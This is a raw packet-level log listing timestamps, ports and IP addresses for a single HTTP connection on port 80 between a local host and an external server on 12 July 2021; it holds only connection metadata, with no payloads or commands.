Jul 12, 2021 10:28:46.326525927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326544046 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326554060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326572895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326594114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326601982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326622009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326637030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326652050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326704025 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326714039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326736927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326759100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326778889 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326790094 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326813936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326828957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326845884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326869011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326893091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.326911926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.326956987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.327559948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.327593088 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.327620029 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.327647924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.327660084 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.327718973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.327928066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.327958107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.327982903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328006983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328021049 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328044891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328073978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328083038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328108072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328123093 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328145027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328167915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328191042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328201056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328248978 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328831911 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328855991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328880072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328907013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328915119 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328938007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328953028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.328974962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.328998089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329018116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329027891 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.329051018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329073906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329082966 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.329123020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.329699039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329727888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329787970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.329807043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329833031 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.329886913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.330038071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.330274105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330305099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330348015 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330368996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330385923 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.330408096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330429077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.330445051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330473900 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330490112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.330507040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330533028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330565929 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.330591917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.330652952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.331170082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331185102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.331271887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331296921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331325054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331343889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.331362963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331392050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331398010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.331423044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331439972 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.331454992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331478119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331499100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.331509113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.331563950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332072973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332103014 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332118988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332135916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332190037 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332242012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332331896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332426071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332453012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332501888 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332520962 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332554102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332577944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332592964 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332612991 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332631111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332658052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332664967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332684994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.332694054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332715988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.332773924 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.333739996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333765030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333787918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333811045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333833933 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333859921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.333875895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333898067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333913088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.333940983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.333965063 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.333978891 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334006071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334028959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334043026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334074974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334541082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334568024 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334589005 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334608078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334634066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334656954 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334675074 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334700108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334713936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334731102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334747076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334763050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334785938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334796906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334820986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334845066 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334851027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.334876060 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.334908009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.335561037 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335591078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335613966 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335635900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.335653067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335685968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335695982 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.335716963 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335741043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335752010 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.335773945 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335796118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335809946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.335829973 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335850000 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.335863113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.335916996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.336566925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336594105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336657047 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.336776018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336798906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336823940 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336848021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336864948 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.336885929 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336903095 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.336925983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336951017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336972952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.336983919 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337003946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337023973 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337033987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337054968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337094069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337546110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337573051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337594032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337625027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337632895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337658882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337677956 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337693930 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337718010 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337728977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337750912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337771893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337788105 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337810040 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337833881 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.337843895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.337898016 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.338804007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338829994 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338850975 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338876009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338901043 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.338915110 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338929892 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.338952065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338974953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.338992119 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339013100 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339024067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.339046955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339063883 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.339077950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339095116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.339186907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339212894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339262009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.339730978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339757919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339785099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339807987 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.339824915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339848995 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339867115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339884996 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339903116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339922905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339942932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339961052 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.339977026 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.340130091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.340545893 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340573072 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340595961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340641022 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.340703964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340728045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340751886 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340763092 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.340812922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340827942 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.340868950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340894938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340924025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340969086 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.340986013 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.340991020 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.341007948 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341032982 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341062069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.341722012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341749907 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341775894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341794014 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.341818094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341841936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341851950 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.341872931 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341887951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.341909885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341934919 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341969013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.341974974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.341995955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342019081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342030048 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.342067957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.342473030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342504025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342580080 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.342787981 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342854977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342936039 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.342952013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342977047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.342999935 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343024969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343035936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343070984 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343102932 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343139887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343163013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343185902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343195915 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343235970 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343257904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343652964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343679905 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343708038 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343717098 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343741894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343767881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343775988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343801022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343827009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343837976 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343862057 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343888044 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343898058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343920946 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343941927 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.343951941 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.343997955 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.344424009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344511032 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344578981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.344629049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344654083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344685078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344706059 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344722986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.344739914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344750881 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.344774008 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344799042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344826937 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.344974041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.344997883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345021009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345031977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.345055103 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345082998 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.345626116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345649958 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.345670938 CEST	80	49720	47.254.186.176	192.168.2.3
